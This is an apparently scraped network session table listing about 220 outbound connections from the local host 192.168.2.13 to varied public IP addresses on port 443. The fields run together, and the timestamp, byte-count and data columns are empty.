                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23921192.168.2.135374052.184.87.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23922192.168.2.1341880196.57.199.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23923192.168.2.133383298.203.70.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23924192.168.2.1341614162.85.27.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23925192.168.2.1354358208.78.195.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23926192.168.2.1350722162.19.14.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23927192.168.2.1348816150.44.109.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23928192.168.2.1353514151.40.140.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23929192.168.2.1354210117.220.114.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23930192.168.2.135124879.169.115.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23931192.168.2.134043458.6.230.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23932192.168.2.1334922170.127.108.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23933192.168.2.1357134113.77.152.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23934192.168.2.134058648.56.126.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23935192.168.2.135683850.182.37.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23936192.168.2.135956044.3.229.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23937192.168.2.1358510154.50.197.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23938192.168.2.1347306178.10.38.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23939192.168.2.133505046.37.180.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23940192.168.2.1359726160.81.187.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23941192.168.2.134636644.61.65.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23942192.168.2.13343941.69.97.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23943192.168.2.1338204116.205.145.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23944192.168.2.1349956188.244.224.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23945192.168.2.1352428123.54.238.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23946192.168.2.134856225.153.112.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23947192.168.2.135358641.219.195.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23948192.168.2.1336452182.22.99.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23949192.168.2.135592077.155.214.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23950192.168.2.134840868.151.239.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23951192.168.2.1348596147.229.103.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23952192.168.2.1358892120.68.37.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23953192.168.2.135516642.96.157.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23954192.168.2.1348016193.128.55.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23955192.168.2.133766647.102.249.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23956192.168.2.1358998150.97.170.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23957192.168.2.1342754137.216.57.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23958192.168.2.1353848108.28.116.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23959192.168.2.1352272186.77.234.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23960192.168.2.13589064.146.59.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23961192.168.2.1352124113.32.144.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23962192.168.2.133865223.157.252.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23963192.168.2.135543689.1.93.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23964192.168.2.135669012.11.104.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23965192.168.2.135141636.146.103.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23966192.168.2.134416634.182.33.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23967192.168.2.1346440149.10.73.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23968192.168.2.133340634.19.122.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23969192.168.2.1344098150.132.151.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23970192.168.2.1337016218.182.52.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23971192.168.2.134589869.216.5.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23972192.168.2.1352154126.23.43.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23973192.168.2.1340282128.243.195.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23974192.168.2.1346058205.90.235.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23975192.168.2.1341282140.194.71.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23976192.168.2.133397472.154.121.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23977192.168.2.1351186210.226.142.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23978192.168.2.1339552102.59.95.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23979192.168.2.134322682.65.187.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23980192.168.2.1358634205.87.184.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23981192.168.2.134007096.74.185.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23982192.168.2.134852478.116.142.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23983192.168.2.1337612183.115.71.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23984192.168.2.1344648171.170.216.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23985192.168.2.135020676.109.184.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23986192.168.2.1345066174.241.153.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23987192.168.2.1341710181.32.60.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23988192.168.2.135713020.201.204.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23989192.168.2.13445088.210.99.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23990192.168.2.134318051.118.78.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23991192.168.2.1349274202.5.134.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23992192.168.2.1335100191.64.140.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23993192.168.2.1352126177.84.116.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23994192.168.2.135212675.106.177.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23995192.168.2.1339998124.174.98.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23996192.168.2.13535508.174.114.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23997192.168.2.135748457.127.132.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23998192.168.2.1342300144.22.86.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23999192.168.2.1356876197.160.216.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24000192.168.2.133964238.231.82.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24001192.168.2.134428031.147.48.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24002192.168.2.134267457.6.139.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24003192.168.2.1349948120.97.176.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24004192.168.2.135706239.254.17.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24005192.168.2.133386419.116.33.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24006192.168.2.1333222132.2.254.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24007192.168.2.13581089.156.207.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24008192.168.2.133781645.198.5.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24009192.168.2.135757662.97.152.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24010192.168.2.133971079.45.162.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24011192.168.2.133902443.59.157.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24012192.168.2.133421237.60.178.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24013192.168.2.1351432101.213.249.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24014192.168.2.1333116158.205.251.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24015192.168.2.1360422112.0.178.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24016192.168.2.1336476152.135.226.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24017192.168.2.13370201.81.49.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24018192.168.2.135166440.45.26.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24019192.168.2.1355916120.147.43.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24020192.168.2.1336322194.26.36.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24021192.168.2.1343578187.175.67.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24022192.168.2.1340610122.133.242.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24023192.168.2.1335590129.232.227.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24024192.168.2.135210269.72.247.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24025192.168.2.1359042103.221.18.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24026192.168.2.1336838131.59.45.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24027192.168.2.1352482223.126.68.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24028192.168.2.135192666.221.171.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24029192.168.2.1346456159.27.134.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24030192.168.2.135447047.27.211.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24031192.168.2.135165081.68.187.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24032192.168.2.1349266155.71.213.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24033192.168.2.1356358104.237.178.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24034192.168.2.134412490.196.139.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24035192.168.2.1350124174.211.28.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24036192.168.2.134608220.55.38.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24037192.168.2.13542205.162.168.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24038192.168.2.1335962179.159.115.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24039192.168.2.1347158172.245.18.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24040192.168.2.136098280.154.91.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24041192.168.2.1353790171.100.151.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24042192.168.2.1345910117.43.66.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24043192.168.2.134204641.240.132.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24044192.168.2.1341514155.106.136.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24045192.168.2.1338952140.210.7.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24046192.168.2.1338236108.102.35.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24047192.168.2.133491818.54.189.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24048192.168.2.134245079.49.69.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24049192.168.2.1348630174.16.45.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24050192.168.2.1335924115.229.17.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24051192.168.2.1348430197.176.122.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24052192.168.2.1351020213.94.227.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24053192.168.2.134474052.206.81.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24054192.168.2.1335612113.249.50.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24055192.168.2.1359504148.230.214.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24056192.168.2.1342288182.124.235.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24057192.168.2.1351958137.182.2.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24058192.168.2.135161483.225.158.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24059192.168.2.133870687.233.174.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24060192.168.2.1343394102.137.157.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24061192.168.2.1357432152.159.219.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24062192.168.2.135099876.41.14.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24063192.168.2.133479053.178.60.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24064192.168.2.1341902183.92.11.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24065192.168.2.135730234.235.69.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24066192.168.2.1332982180.84.217.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24067192.168.2.134319283.230.188.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24068192.168.2.1344464146.251.228.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24069192.168.2.135947893.137.254.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24070192.168.2.1359128157.206.49.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24071192.168.2.1357720147.76.177.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24072192.168.2.1334282217.111.210.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24073192.168.2.13560749.57.122.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24074192.168.2.134200637.178.99.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24075192.168.2.13344248.95.131.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24076192.168.2.135204499.54.228.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24077192.168.2.1358862157.102.151.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24078192.168.2.1356964118.68.243.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24079192.168.2.133646613.196.188.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24080192.168.2.1359956118.111.229.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24081192.168.2.1359436173.248.208.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24082192.168.2.1335488142.252.146.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24083192.168.2.1334036157.123.166.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24084192.168.2.1356286124.187.216.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24085192.168.2.1343212122.42.244.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24086192.168.2.1333464129.152.141.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24087192.168.2.1358826171.155.67.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24088192.168.2.1341708168.126.78.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24089192.168.2.1349974146.245.27.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24090192.168.2.133933463.96.146.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24091192.168.2.134985090.11.110.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24092192.168.2.136013494.90.238.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24093192.168.2.135394289.32.48.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24094192.168.2.1353476173.173.57.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24095192.168.2.1349828190.111.4.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24096192.168.2.134222858.108.24.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24097192.168.2.1354676173.49.230.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24098192.168.2.1338244202.214.52.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24099192.168.2.1346714129.236.197.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24100192.168.2.134703668.83.140.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24101192.168.2.1358394201.172.20.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24102192.168.2.1354270102.235.228.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24103192.168.2.134719281.36.82.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24104192.168.2.1358554171.242.155.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24105192.168.2.1359816203.118.116.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24106192.168.2.1350964150.218.126.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24107192.168.2.1358432162.40.28.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24108192.168.2.133758864.251.35.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24109192.168.2.1344788208.135.112.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24110192.168.2.1348356157.100.118.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24111192.168.2.135957650.24.23.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24112192.168.2.133550287.140.27.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24113192.168.2.133395089.211.146.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24114192.168.2.1345000196.179.87.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24115192.168.2.1352946170.136.211.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24116192.168.2.1338496210.219.237.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24117192.168.2.1353654144.189.0.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24118192.168.2.1359926125.116.146.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24119192.168.2.1335088200.84.219.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24120192.168.2.1345310210.116.247.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24121192.168.2.1335516180.31.73.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24122192.168.2.1360340204.22.221.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24123192.168.2.1345090181.66.55.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24124192.168.2.1341486111.43.52.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24125192.168.2.1340408116.75.134.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24126192.168.2.1337940124.226.119.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24127192.168.2.134720692.20.61.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24128192.168.2.135572051.22.112.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24129192.168.2.1353098188.109.151.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24130192.168.2.1341196146.168.71.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24131192.168.2.135095832.49.11.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24132192.168.2.1349428159.215.72.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24133192.168.2.134549644.18.14.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24134192.168.2.1348508191.36.247.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24135192.168.2.1344650172.98.252.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24136192.168.2.134592264.58.102.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24137192.168.2.1339130135.194.100.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24138192.168.2.135191036.131.197.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24139192.168.2.135695273.205.244.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24140192.168.2.1347282141.177.200.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24141192.168.2.1352222208.118.233.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24142192.168.2.1350894111.231.64.76443
